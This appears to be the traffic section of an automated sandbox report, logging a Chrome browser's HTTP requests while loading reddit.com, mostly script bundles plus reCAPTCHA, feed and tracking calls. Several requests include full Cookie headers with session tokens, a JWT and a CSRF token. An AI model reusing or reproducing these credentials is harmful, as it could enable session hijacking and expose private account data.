Source: global trafficHTTP traffic detected: GET /shreddit/en-US/smart-escalations-provider-client-js-e0225ba6.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/mod-inline-actions-client-js-46e8a0f2.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/community-onboarding-completed-modal-client-js-43e757b5.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/mod-inline-actions-client-js-46e8a0f2.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/rpl-bottom-sheet-8e59d76a.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/mod-inline-actions-client-js-46e8a0f2.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/click-card-32ea2f71.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/mod-inline-actions-client-js-46e8a0f2.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/previous-actions-client-js-b2badcb0.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/mod-inline-actions-client-js-46e8a0f2.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/faceplate-bottom-sheet-header-b31e0ad4.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/mod-inline-actions-client-js-46e8a0f2.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/shreddit-feed-page-loading-7a9d44d9.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/popular-feed-client-js-5048ccd1.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/feed-feature-client-js-82508c4e.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/popular-feed-client-js-5048ccd1.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/shreddit-post-translator-9cb3ecae.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/popular-feed-client-js-5048ccd1.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/shreddit-layout-event-setter-d0949dae.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/popular-feed-client-js-5048ccd1.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/translation-feedback-modal-client-js-8ce911d1.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/popular-feed-client-js-5048ccd1.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/feeds-efba5867.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/popular-feed-client-js-5048ccd1.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/base-translator-b41f5754.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/popular-feed-client-js-5048ccd1.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/banned-user-banner-client-js-feaea128.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/popular-feed-client-js-5048ccd1.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/feedback-tooltip-overflow-menu-cbfa9270.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shreddit-post-overflow-menu-cfb336ae.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/with-post-actions-283c4a7a.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shreddit-post-overflow-menu-cfb336ae.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /reports HTTP/1.1Host: w3-reporting.reddit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: rdt=f141fda34bbc28d220dd95ca654729b5; edgebucket=A7pEG7LhumUcimytWF; loid=000000001nuyrg96hz.2.1745344514857.Z0FBQUFBQm9COWdDbEdFZW5DdHR6SXBESUs3MjdrYnZCMDh1bV90RnZISVRhSDluMlN1STFiQjFFUEFpN1BBMTJtQ2tuNmR2SEhPUDRNNmNnbGloeE5JbUh1T3NWM3VXdTJ1WVl3cVVCQ2FOeG5EUE1QTXZZaU1jLWhWeTJnU1B4eGJmVUJKVXNxTFE; csrf_token=bc2c05c73ac370d65940c9a0c8742cb4; token_v2=eyJhbGciOiJSUzI1NiIsImtpZCI6IlNIQTI1NjpzS3dsMnlsV0VtMjVmcXhwTU40cWY4MXE2OWFFdWFyMnpLMUdhVGxjdWNZIiwidHlwIjoiSldUIn0.eyJzdWIiOiJsb2lkIiwiZXhwIjoxNzQ1NDMwOTE0Ljg1NzU5MywiaWF0IjoxNzQ1MzQ0NTE0Ljg1NzU5MywianRpIjoiTFlUZ0dRY3cwWUV2aTBPY3lEQnY5Z3JqVnpvN2h3IiwiY2lkIjoiMFItV0FNaHVvby1NeVEiLCJsaWQiOiJ0Ml8xbnV5cmc5Nmh6IiwibGNhIjoxNzQ1MzQ0NTE0ODU3LCJzY3AiOiJlSnhra2RHT3REQUloZC1GYTVfZ2Y1VV9tMDF0Y1lhc0xRYW9rM243RFZvY2s3MDdjRDRwSFA5REtvcUZEQ1pYZ3FuQUJGZ1RyVERCUnVUOW5MbTNnMmlOZTh0WXNabkNCRm13RkRya21MR3NpUVFtZUpJYXl4c21vSUxOeUZ5dXRHTk5MVDBRSnFoY01yZUZIcGMyb2JrYmk1NmRHRlc1ckR5b3NWZmwwdGpHRkxZbnhqY2JxdzJwdUM2bk1rbkxRdmtzWHZUak45VzM5dm16X1NhMEo4T0txdW1CM2hsSkNHNHNmcGltM2Q5VGs1NnRDeGExOTNxUTJ1ZDYzSzU5MWl3ME83ZWY2X2xySXhtWFkyaC1KdnQzMXktaEE0ODhMelBxQUVhczRVY1pkbVFkX2xVSFVMbWdKR01KNHRNSTVNcmwyMzhKdG12VHY4YnRFejk4TS1LbU5feldETlJ6Q2VMUXBfSDFHd0FBX184UTFlVFIiLCJmbG8iOjF9.XL7oIg3MwKheG_ccxTL7Kp6WHBk4VVCLT3AdIZK0PL9rzXFg7esuRkQA3gxm6FqE_RO3OV2TEpCdGXucr_u_2AI3m0Q__HV4Fc74jpHiSc9SK61g2OU-d5gwNX7RsLZ44fYWYHs6U9lR6N-TyAdgC7GrAkPPtrvCs8qbDuzNfqOjoMhQSN_ccE9B_mv_jpdmy_iOOLyEg42MU0XZ_fe8oQFufFlemtk0Ildlc1PG3s-ldYjnw1CDYD-IseokcGbETMLViJnLjc_fQ4wfhJwSB8xzaQMoPX7eUu61t9nqwIZv6yun2ASiBTbc8Y7fVC1Qx-NVzBanvAvnWi9pgm3wtQ; csv=2; session_tracker=brgcmaqpjfinlpaqdm.0.1745344534389.Z0FBQUFBQm9COWdXNk9VX0hhd3hSWmplN2Z3S0tTbjF6UVpsa1h5eDhoRE5rd1BPSTRaaU1VeEM0V2gwZWxpXzVNRUhfUzduQ0syMVQxZFY3X2I1Mmd2SDBpcndBWnhwdWtDcHo0NGdMUlNGNmFSZDk1QjJadjJGYWh5TWprWmRJeGwxdHdUQ0I5eVI
Source: global trafficHTTP traffic detected: GET /recaptcha/enterprise.js?render=6LcZL1spAAAAAIzQl_DXGakd-J2uwjnfZas9G-Rj HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*X-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/start-end-ama-actions-controller-5384925e.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shreddit-post-overflow-menu-cfb336ae.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/upload-350fce7d.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shreddit-player-2-c1d75db3.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/ads-carousel-bdc648e7.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/gallery-carousel-f4996dfe.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /recaptcha/enterprise.js?render=6LfirrMoAAAAAHZOipvza4kpp_VtTwLNuXVwURNQ HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*X-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/render-toast-b6f77e7e.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/alert-controller-client-js-d21c2f4c.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /svc/shreddit/feeds/popular-feed?after=dDNfMWs0d21uaQ%3D%3D&distance=4&sort=HOT&adDistance=2&navigationSessionId=945dc28c-1e9e-440b-9a8f-36a8d573acf7&ad_posts_served=1&cursor=dDNfMWs0d21uaQ%3D%3D HTTP/1.1Host: www.reddit.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/vnd.reddit.partial+html, text/html;q=0.9sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.reddit.com/?rdt=54831Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: rdt=f141fda34bbc28d220dd95ca654729b5; edgebucket=A7pEG7LhumUcimytWF; loid=000000001nuyrg96hz.2.1745344514857.Z0FBQUFBQm9COWdDbEdFZW5DdHR6SXBESUs3MjdrYnZCMDh1bV90RnZISVRhSDluMlN1STFiQjFFUEFpN1BBMTJtQ2tuNmR2SEhPUDRNNmNnbGloeE5JbUh1T3NWM3VXdTJ1WVl3cVVCQ2FOeG5EUE1QTXZZaU1jLWhWeTJnU1B4eGJmVUJKVXNxTFE; csrf_token=bc2c05c73ac370d65940c9a0c8742cb4; token_v2=eyJhbGciOiJSUzI1NiIsImtpZCI6IlNIQTI1NjpzS3dsMnlsV0VtMjVmcXhwTU40cWY4MXE2OWFFdWFyMnpLMUdhVGxjdWNZIiwidHlwIjoiSldUIn0.eyJzdWIiOiJsb2lkIiwiZXhwIjoxNzQ1NDMwOTE0Ljg1NzU5MywiaWF0IjoxNzQ1MzQ0NTE0Ljg1NzU5MywianRpIjoiTFlUZ0dRY3cwWUV2aTBPY3lEQnY5Z3JqVnpvN2h3IiwiY2lkIjoiMFItV0FNaHVvby1NeVEiLCJsaWQiOiJ0Ml8xbnV5cmc5Nmh6IiwibGNhIjoxNzQ1MzQ0NTE0ODU3LCJzY3AiOiJlSnhra2RHT3REQUloZC1GYTVfZ2Y1VV9tMDF0Y1lhc0xRYW9rM243RFZvY2s3MDdjRDRwSFA5REtvcUZEQ1pYZ3FuQUJGZ1RyVERCUnVUOW5MbTNnMmlOZTh0WXNabkNCRm13RkRya21MR3NpUVFtZUpJYXl4c21vSUxOeUZ5dXRHTk5MVDBRSnFoY01yZUZIcGMyb2JrYmk1NmRHRlc1ckR5b3NWZmwwdGpHRkxZbnhqY2JxdzJwdUM2bk1rbkxRdmtzWHZUak45VzM5dm16X1NhMEo4T0txdW1CM2hsSkNHNHNmcGltM2Q5VGs1NnRDeGExOTNxUTJ1ZDYzSzU5MWl3ME83ZWY2X2xySXhtWFkyaC1KdnQzMXktaEE0ODhMelBxQUVhczRVY1pkbVFkX2xVSFVMbWdKR01KNHRNSTVNcmwyMzhKdG12VHY4YnRFejk4TS1LbU5feldETlJ6Q2VMUXBfSDFHd0FBX184UTFlVFIiLCJmbG8iOjF9.XL7oIg3MwKheG_ccxTL7Kp6WHBk4VVCLT3AdIZK0PL9rzXFg7esuRkQA3gxm6FqE_RO3OV2TEpCdGXucr_u_2AI3m0Q__HV4Fc74jpHiSc9SK61g2OU-d5gwNX7RsLZ44fYWYHs6U9lR6N-TyAdgC7GrAkPPtrvCs8qbDuzNfqOjoMhQSN_ccE9B_mv_jpdmy_iOOLyEg42MU0XZ_fe8oQFufFlemtk0Ildlc1PG3s-ldYjnw1CDYD-IseokcGbETMLViJnLjc_fQ4wfhJwSB8xzaQMoPX7eUu61t9nqwIZv6yun2ASiBTbc8Y7fVC1Qx-NVzBanvAvnWi9pgm3wtQ; csv=2; session_tracker=brgcmaqpjfinlpaqdm.0.1745344534389.Z0FBQUFBQm9COWdXNk9VX0hhd3hSWmplN2Z3S0tTbjF6UVpsa1h5eDhoRE5rd1BPSTRaaU1VeEM0V2gwZWxpXzVNRUhfUzduQ0syMVQxZFY3X2I1Mmd2SDBpcndBWnhwdWtDcHo0NGdMUlNGNmFSZDk1QjJadjJGYWh5TWprWmRJeGwxdHdUQ0I5eVI
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/reddit-recent-pages-c0f7b0df.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/left-nav-recent-section-client-js-cad9dd70.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/large-7a96dec8.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shell-4994f581.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /i.gif?za=U1PIwb8qAqaOqN1LQsbCbYhAlXBhPZMbqlxdM5vX9bL6nMfmxouVcYPPDCy3px7Et3tM3rkvhrHJq1hEUza0-bSWm0Ycy2MN4SjtYmQHQcMawNRGTP2RmG9QQ-fiz9pv7mDAiygmP6EldFgGLVZGI2Y9g5M1x2-4_6UxAdDsoaC481I4nTtoZxQyO-YZw8D7BPFC775SBb4SxmceSsVQjapRAI0uuasqKVLzxkiD9NQh7K6cNg2X&zp=4cXXzHWq3Vmjel5C_wCpiFjWkTGO24SmsZ4jxlw8X4KiluzbpXG8EVDDmCHRX5BcR7nQbrf6-BOuvRWZH3qkRHfyuc5sRcbbYRfO-19j-dsE0CZSBVns-0p670PvQA&a=0&b=0&be=0&c=0&d=0&e=0&ea=0&eb=0&f=0&r=0&g=0&i=1745344522916&t=1745344522916&o=0&q=0&h=0&w=0&sh=1024&sw=1280 HTTP/1.1Host: alb.reddit.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: rdt=f141fda34bbc28d220dd95ca654729b5; edgebucket=A7pEG7LhumUcimytWF; loid=000000001nuyrg96hz.2.1745344514857.Z0FBQUFBQm9COWdDbEdFZW5DdHR6SXBESUs3MjdrYnZCMDh1bV90RnZISVRhSDluMlN1STFiQjFFUEFpN1BBMTJtQ2tuNmR2SEhPUDRNNmNnbGloeE5JbUh1T3NWM3VXdTJ1WVl3cVVCQ2FOeG5EUE1QTXZZaU1jLWhWeTJnU1B4eGJmVUJKVXNxTFE; csrf_token=bc2c05c73ac370d65940c9a0c8742cb4; 